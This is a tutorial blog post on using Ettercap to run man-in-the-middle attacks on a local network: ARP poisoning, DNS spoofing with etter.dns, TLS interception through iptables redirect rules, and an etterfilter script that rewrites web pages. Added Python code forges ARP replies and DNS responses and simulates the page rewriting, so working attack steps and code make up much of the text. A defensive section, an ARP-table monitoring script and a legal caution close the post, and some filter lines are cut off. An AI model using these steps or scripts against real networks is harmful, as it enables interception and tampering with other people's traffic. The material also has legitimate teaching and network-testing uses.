
How to use Ettercap
(https://kalitut.com/)
Last Updated on May 26, 2021 by Walid Salame (https://kalitut.com/author/walid/)

What is Ettercap? Ettercap is a utility for analyzing the network traffic that passes
through a computer's interface, with extra functionality on top of plain sniffing. It can
mount "Man in the middle" attacks that force another computer on the local network to
send its packets not to the router but to you.

With Ettercap you can check how susceptible your network is to this kind of attack,
analyze the traffic of several computers at once, and even modify it on the fly. In this
article we look at how to use Ettercap to analyze and modify traffic.

What is a man in the middle attack?
How to install Ettercap on Kali Linux
Using the Ettercap GUI
ARP poisoning attack in Ettercap
DNS spoofing with Ettercap
Ettercap filters
How to protect yourself?

What is a man in the middle attack?

By default, a computer hands every packet destined for the Internet to its router (the
default gateway), which forwards it to the next router, and so on until the packet
reaches its destination. For certain reasons, however, a packet can be made to go not
to the router first but to your computer, and only then on to the router.

The computer the packets pass through can read their source and destination addresses
and, if they are not encrypted, their full contents. There are two ways to carry out a
MITM (Man In The Middle) attack with Ettercap:

ARP attack – using the properties of the ARP protocol, your computer tells the other
hosts that it is the router, after which all their packets start flowing through it;
DNS attack – when a computer asks for the IP address of a domain, we answer with an
address of our own choosing; for this to work you must already be in the path of the
traffic, so it is used together with the ARP method.

Ettercap on Linux can perform both kinds of attack. In addition, the utility can perform
denial of service attacks and scan ports. Now let's look at how to install and use
Ettercap.

How to install Ettercap on Kali Linux

This is a popular program among network security specialists, so it is in the official
repositories of most distributions, and Kali Linux ships it preinstalled. On older
Ubuntu releases the GTK build was installed with:

sudo apt install ettercap-gtk

On current Debian, Ubuntu and Kali releases the package is named ettercap-graphical
(or ettercap-text-only if you do not need the GUI), so substitute that name. On Fedora
and distributions based on it the package is simply called ettercap and dnf has
replaced yum, so the command looks like this:

sudo dnf install ettercap

That takes care of installing Ettercap; before using it, change a few settings in its
configuration file:

sudo vi /etc/ettercap/etter.conf

By default Ettercap drops its privileges to the user nobody once it has opened the
capture interface. Set ec_uid and ec_gid to 0 so that it keeps running as root, which
the redirection rules below and several plugins need:

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Next, find the two redir_command lines in the iptables part of the file and uncomment
them (shown here abbreviated; the full rules are in the shipped etter.conf):

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -

Ettercap runs these to redirect intercepted connections on the SSL ports to its own
listening port, so that it can terminate the TLS session itself with a self-signed
certificate and read the plaintext. Expect every modern browser to show a certificate
error when this happens, and sites protected by HSTS or certificate pinning to refuse
the connection altogether. Save the changes and the program is ready to work.

Using the Ettercap GUI

The program can work in several modes: with a graphical interface, with a text or
curses interface in a terminal, and as a daemon. Here we use the graphical interface.
To start it with the GTK front end, use the -G option:

sudo -E ettercap -G

The -E option makes sudo keep our user's environment variables, which the GUI needs in
order to find the X display. The main window of the program is very simple. First we
look at how the ARP poisoning attack is performed.

ARP poisoning attack in Ettercap

As said above, with this attack we force the target computer to send its packets not to
the router but to us. It works quite simply. The computer knows the router's IP
address; it obtained it when it joined the network. But every time it needs to send a
packet it has to translate that IP address into the low-level address of the network
technology in use, which for Ethernet and Wi-Fi is the MAC address.

The ARP protocol is used for this. The computer broadcasts a request to every device on
the network, for example "who has 192.168.1.1?", and the router, seeing its own address,
replies with its MAC. The answer is then kept in the ARP cache. Ettercap exploits the
fact that hosts accept ARP replies they never asked for: it sends the target a reply
that pairs the router's IP with our MAC address, the target overwrites its cache entry,
and from then on every packet meant for the router is delivered to us, and we forward
it where it needs to go.

Let's get to it and run the ARP spoofing attack. In Ettercap open the Sniff menu and
select Unified sniffing. Then select your network interface, for example eth0 or wlan0.

The program window changes and many more functions become available. Now you need to
scan the network: open the Hosts menu and click Scan for hosts. If the scan does not
work for some reason, you can also load the list of hosts from a file.

After the quick scan, open Hosts -> Hosts list and you will see the devices found on the
network.

To start the attack we need to specify target 1 and target 2. Target 1 is the IP of the
machine we are going to attack, and target 2 is the IP of the router. Select each in the
hosts list and use the Add to Target 1 and Add to Target 2 buttons.

Next, open the MITM menu and select ARP poisoning. In the window that opens, tick
Sniff remote connections: without it Ettercap only looks at traffic whose two endpoints
are the two targets, with it it also sniffs the target's traffic to hosts beyond the
router, i.e. the Internet, which is what we want here.

Now, to start the spoofing, choose Start sniffing from the Start menu.

From that moment the program keeps sending ARP replies that tell 192.168.1.3 to replace
the router's MAC address with ours, and tell the router the same about 192.168.1.3, so
that both directions of the traffic pass through us. The attack is running. Open
View -> Connections to see the target device's active connections.

If a connection is not encrypted, you can view the transmitted data by double-clicking
on it. The data sent by the target is shown on the left and the data it received on
the right.
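To make the mechanics above concrete, here is an added example (not code from the article or from the Ettercap project) that builds the same kind of forged ARP reply Ettercap sends for Target 1 and Target 2, and feeds it to a model of an unprotected host's ARP cache. The addresses are constructed lab values: 192.168.1.3 is the victim as in the article, 192.168.1.1 the router, and 192.168.1.10 with MAC aa:aa:aa:aa:aa:aa is an assumed attacker. For reference, the text-mode equivalent of the GUI steps is ettercap -T -q -i eth0 -M arp:remote /192.168.1.3// /192.168.1.1// (the /IP// target form is for 0.8.x builds with IPv6 support; older builds use /IP/).

```python
import struct

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed lab addresses (assumptions; the victim and router match the article).
ATTACKER = ("192.168.1.10", "aa:aa:aa:aa:aa:aa")
VICTIM = ("192.168.1.3", "cc:cc:cc:cc:cc:cc")     # Target 1
ROUTER = ("192.168.1.1", "ee:ee:ee:ee:ee:ee")     # Target 2


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet II frame carrying an ARP reply: '<sender_ip> is at <sender_mac>'.

    A poisoned reply is nothing special on the wire: it just puts the router's
    IP next to the attacker's MAC in the sender fields.
    """
    eth_hdr = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp_hdr = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    body = (mac_bytes(sender_mac) + ip_bytes(sender_ip)
            + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth_hdr + arp_hdr + body


def parse_arp(frame):
    """Decode the fields a host's ARP implementation acts on."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class NaiveArpCache:
    """Models the default behaviour the attack relies on: a reply, solicited or
    not, overwrites whatever MAC is cached for that IP."""

    def __init__(self):
        self.table = {}

    def learn(self, frame):
        arp = parse_arp(frame)
        if arp["op"] == ARP_REPLY:
            self.table[arp["sender_ip"]] = arp["sender_mac"]
        return arp


def poison_pair(victim, router, attacker):
    """The two frames one poisoning round sends: the victim is told the router is
    at the attacker's MAC, the router is told the victim is at the attacker's MAC,
    so both directions of the conversation pass through the attacker."""
    to_victim = build_arp_reply(router[0], attacker[1], victim[0], victim[1])
    to_router = build_arp_reply(victim[0], attacker[1], router[0], router[1])
    return to_victim, to_router


def demo():
    """Returns (router MAC cached by victim before, after; victim MAC cached by router after)."""
    victim_cache, router_cache = NaiveArpCache(), NaiveArpCache()
    # Legitimate state: each side answered the other's original ARP request.
    victim_cache.learn(build_arp_reply(ROUTER[0], ROUTER[1], VICTIM[0], VICTIM[1]))
    router_cache.learn(build_arp_reply(VICTIM[0], VICTIM[1], ROUTER[0], ROUTER[1]))
    before = victim_cache.table[ROUTER[0]]
    to_victim, to_router = poison_pair(VICTIM, ROUTER, ATTACKER)
    victim_cache.learn(to_victim)
    router_cache.learn(to_router)
    return before, victim_cache.table[ROUTER[0]], router_cache.table[VICTIM[0]]


if __name__ == "__main__":
    print(demo())
```

Two details the model leaves out, and Ettercap handles for you: the poisoned entries would age out and be re-learned from the real router, so the replies have to be resent periodically for as long as the attack runs, and the attacker must actually forward the hijacked packets to their real destination or the target simply loses connectivity.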
DNS spoofing with Ettercap

A special service, DNS, converts site names into IP addresses. When a computer needs
the IP of a site, it asks a DNS server for it. If you are already performing a MITM
attack, you can spoof the server's answer so that instead of the site's real IP, an IP
of your choosing is returned. First we need to edit the /etc/ettercap/etter.dns file:

sudo vi /etc/ettercap/etter.dns

google.com A 127.0.0.1

This record means that we will answer queries for google.com with 127.0.0.1 instead of
its real address. Note that this attack does not work without the previous one: the
dns_spoof plugin can only answer queries that pass through Ettercap. Next, open the
menu Plugins -> Manage the plugins and double-click the dns_spoof plugin.

The plugin is now active and you can check on the target device that the DNS replies
really are being replaced. For example, run on the target machine:

ping google.com

ping www.ettercap.org

Each name should now resolve to the address you configured for it (add a record for
www.ettercap.org as well if you want the second test to be spoofed). An answer the
target already has in its resolver cache is not affected until its TTL expires, and
clients that use DNS over HTTPS or DNS over TLS send no plain DNS queries for the
plugin to intercept.

Besides this plugin, there are others with which you can perform the actions you need.
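The following added example (written for this page, not taken from the article or from Ettercap's dns_spoof plugin) shows what the plugin has to do with a query it intercepts: read a small etter.dns-style list, parse the target's DNS query, and forge a reply that carries the same transaction ID and question but our address as the answer. The records, the transaction IDs and the 192.168.1.10 address are constructed; the '*' wildcard in a name is handled as a glob here, which is an assumption about how broadly Ettercap's own matching applies it.

```python
import fnmatch
import struct

# Constructed etter.dns-style records for this example (not the article's file).
ETTER_DNS = """\
# name            type  value
google.com        A     127.0.0.1
*.ettercap.org    A     192.168.1.10
"""


def parse_etter_dns(text):
    """Read 'name A ip' lines; '#' starts a comment, '*' in a name is a wildcard."""
    records = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, rtype, value = line.split()
        if rtype.upper() == "A":
            records.append((name.lower().rstrip("."), value))
    return records


def lookup(records, qname):
    qname = qname.lower().rstrip(".")
    for pattern, ip in records:
        if fnmatch.fnmatchcase(qname, pattern):
            return ip
    return None


def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a DNS name at offset off, following compression pointers."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                    # pointer to an earlier name
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def build_query(txid, qname, qtype=1):
    """What the victim's resolver sends: header with RD set plus one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return txid, qname, qtype, msg[12:off + 4]


def spoof_response(query, records, ttl=3600):
    """Forge the reply: same transaction ID and question section as the query,
    QR/RD/RA flags set, one A record with the address from the list. A resolver
    discards a reply whose ID or question does not match, which is why the
    query has to be seen first (the ARP MITM). Names not in the list get None
    and are left to the real server."""
    txid, qname, qtype, question = parse_query(query)
    if qtype != 1:                                    # only A queries handled here
        return None
    ip = lookup(records, qname)
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    rdata = bytes(int(x) for x in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def first_answer_ip(response):
    """Extract the A record from a response (the address `ping` would use)."""
    _, off = decode_name(response, 12)               # skip the question name
    off += 4                                          # and its type/class
    _, off = decode_name(response, off)              # answer name (a pointer)
    rtype, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    if rtype != 1:
        return None
    return ".".join(str(b) for b in response[off + 10:off + 10 + rdlen])
```

The forged reply wins only because the attacker sits between the target and the real server and answers first; the genuine reply arriving later is ignored by the resolver, as the transaction has already been answered.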

Ettercap filters

Filters allow you to modify the packets passing through the program on the fly. You can
drop packets or make the changes you need with the replace function. Filters, too, only
work while the MITM attack is running. The syntax of the conditions used to select
packets is very similar to Wireshark's display filters. Consider a simple filter that
replaces every picture on a page with ours:

vi test.filter

if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
  }
}
if (ip.proto == TCP && tcp.src == 80) {
  replace("img src=", "img src=\"https://pbs.twimg.com/profile_i
  replace("IMG SRC=", "img src=\"https://pbs.twimg.com/profile_i
  msg("Filter Ran.\n");
}

Anyone who has used a programming language will find this readable. If the protocol is
TCP and the destination port is 80, i.e. a request from the browser to a web server, we
look for the Accept-Encoding header and replace it with another word of the same
length. Without that, a browser that sends Accept-Encoding: gzip would get a compressed
response, and our search for image tags in that compressed data would never match. In
the server's response, recognised by source port 80, we replace all image tags with
ours (the original src attribute is left behind as a junk token the browser ignores).
Now the filter needs to be compiled:

etterfilter test.filter -o test.ef

It remains to load the filter through the Filters -> Load Filter menu and select the
compiled file in the file dialog. The filter is now loaded; open any site that does not
use HTTPS to check that it works. To stop the MITM attack, open the MITM menu and select
Stop All Mitm attacks. Our Ettercap manual is coming to an end, but …
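Why the Accept-Encoding trick matters is easiest to see by running the two filter rules against an HTTP exchange. The added example below (written for this page, not Ettercap's filter engine) mirrors the two blocks of test.filter in Python against a constructed request and a toy origin server that compresses its answer whenever the client offers gzip. The request, page and the attacker-hosted picture URL (192.168.1.10) are all constructed.

```python
import gzip

# Constructed HTTP exchange (not captured traffic).
REQUEST = (b"GET /index.html HTTP/1.1\r\n"
           b"Host: example.test\r\n"
           b"Accept-Encoding: gzip, deflate\r\n\r\n")
PAGE = (b'<html><body><img src="/logo.png">'
        b'<IMG SRC="/banner.gif"></body></html>')
OUR_IMAGE = b"http://192.168.1.10/our.png"        # assumed attacker-hosted picture


def origin_server(request):
    """Toy web server: compresses the body whenever the client offers gzip."""
    body = PAGE
    headers = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    if b"Accept-Encoding:" in request and b"gzip" in request:
        body = gzip.compress(PAGE)
        headers += b"Content-Encoding: gzip\r\n"
    headers += b"Content-Length: %d\r\n\r\n" % len(body)
    return headers + body


def filter_request(segment):
    """First filter block: find the header and replace it with a string of the
    same length, so the TCP payload length and sequence numbers stay untouched.
    Returns (rewritten segment, whether the header was found)."""
    old, new = b"Accept-Encoding", b"Accept-Rubbish!"
    if len(old) != len(new):
        raise ValueError("replacement must keep the original length")
    return segment.replace(old, new), old in segment


def filter_response(segment, new_src):
    """Second filter block: rewrite both spellings of the tag. The original src
    value stays behind as an unnamed attribute token that browsers ignore.
    Returns (rewritten segment, number of tags rewritten)."""
    hits = 0
    for tag in (b"img src=", b"IMG SRC="):
        hits += segment.count(tag)
        segment = segment.replace(tag, b'img src="' + new_src + b'" ')
    return segment, hits


def mitm_exchange(zap_accept_encoding):
    """Run one request/response pair through the filters.
    Returns (number of image tags rewritten, the response the browser sees)."""
    request = REQUEST
    if zap_accept_encoding:
        request, _ = filter_request(request)
    response = origin_server(request)
    response, hits = filter_response(response, OUR_IMAGE)
    return hits, response


if __name__ == "__main__":
    print("without zapping Accept-Encoding:", mitm_exchange(False)[0], "tags rewritten")
    print("with zapping Accept-Encoding:   ", mitm_exchange(True)[0], "tags rewritten")
```

With the header left alone the server answers with a gzip body, the byte search for img src= finds nothing and zero tags are rewritten; after the same-length zap the server sends plain HTML and both tags are replaced. The same limitation applies one level up: over HTTPS the whole stream is opaque to the filter, which is why the text says to test on a site without HTTPS.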

How to protect yourself?

After reading this you probably have a reasonable question: how do you protect your
computer from this type of attack? There are several tools for this, including for
Linux:

XArp is a graphical utility that detects attempts to spoof MAC addresses through ARP
and counteracts them. It works on Windows and on Linux;
Snort is a well-known intrusion detection system which, among other things, detects
attacks on the ARP protocol;
ArpON is a small service that monitors the ARP table and protects it against spoofed
MAC addresses.

Beyond host tools, a static ARP entry for the gateway, Dynamic ARP Inspection together
with DHCP snooping on managed switches, and above all TLS everywhere (with HSTS) limit
what an attacker in this position can read or change.
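The two checks a monitor such as ArpON applies to the ARP table are simple enough to script. The added example below (written for this page, not code from any of the tools listed) parses constructed `ip -4 neigh show` output, one snapshot from a healthy host and one taken while the ARP poisoning described earlier is running, and reports a pinned gateway MAC that has moved as well as one MAC answering for several IPs. All addresses are constructed lab values.

```python
# Constructed `ip -4 neigh show` output (not real captures): the first snapshot is
# the normal state, the second was taken while the ARP poisoning was running.
SNAPSHOT_CLEAN = """\
192.168.1.1 dev eth0 lladdr ee:ee:ee:ee:ee:ee REACHABLE
192.168.1.10 dev eth0 lladdr aa:aa:aa:aa:aa:aa STALE
192.168.1.20 dev eth0 lladdr bb:bb:bb:bb:bb:bb REACHABLE
192.168.1.30 dev eth0  FAILED
"""
SNAPSHOT_POISONED = """\
192.168.1.1 dev eth0 lladdr aa:aa:aa:aa:aa:aa REACHABLE
192.168.1.10 dev eth0 lladdr aa:aa:aa:aa:aa:aa REACHABLE
192.168.1.20 dev eth0 lladdr bb:bb:bb:bb:bb:bb REACHABLE
"""

# Pinned gateway MAC, e.g. read from the router's label (assumed value).
PINNED = {"192.168.1.1": "ee:ee:ee:ee:ee:ee"}


def parse_neigh(text):
    """Map IP -> MAC from `ip neigh` lines; entries without lladdr are skipped."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" in fields:
            table[fields[0]] = fields[fields.index("lladdr") + 1].lower()
    return table


def check_arp_table(table, pinned):
    """Two checks an ARP-table monitor runs on every change. Returns alert strings."""
    alerts = []
    # 1. A pinned address must never move to another MAC.
    for ip, expected in pinned.items():
        seen = table.get(ip)
        if seen is not None and seen != expected:
            alerts.append(f"gateway {ip} moved from {expected} to {seen}")
    # 2. One MAC answering for several IPs is the usual fingerprint of a poisoner.
    #    Legitimate causes exist too (VRRP, multi-homed hosts, some VM setups),
    #    so treat this one as a warning rather than proof.
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims {', '.join(sorted(ips))}")
    return alerts


def scan_snapshot(text, pinned=PINNED):
    return check_arp_table(parse_neigh(text), pinned)


if __name__ == "__main__":
    for name, snap in (("clean", SNAPSHOT_CLEAN), ("poisoned", SNAPSHOT_POISONED)):
        print(name, scan_snapshot(snap) or ["no alerts"])
```

On a real host you would feed the script the live output of ip -4 neigh show, and pin the gateway with ip neigh replace 192.168.1.1 lladdr ee:ee:ee:ee:ee:ee dev eth0 nud permanent so the kernel stops accepting updates for it at all; the second check then only serves to spot poisoning aimed at other hosts on the segment.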
Conclusion

In this article we looked at how to use Ettercap, a program for analyzing network
packets and performing Man-in-the-Middle attacks. Use the program only to test the
security of your own networks or applications, and do not forget that illegal actions
in the information space are punishable too.

Comments

jack says
May 16, 2019 at 8:20 pm (https://kalitut.com/how-to-use-ettercap/#comment-29)

Where can I download this ettercap? The one I downloaded is ettercap ng-0.7.3.

Reply

Walid Salame says


May 16, 2019 at 8:23 pm (https://kalitut.com/how-to-use-ettercap/#comment-28)

You can download the newest ettercap from this page: https://www.ettercap-project.org/downloads.html
Reply

Mandi says
November 7, 2022 at 6:43 pm (https://kalitut.com/how-to-use-ettercap/#comment-
26768)

Hi, how can I edit the ettercap file? Thanks.

Reply
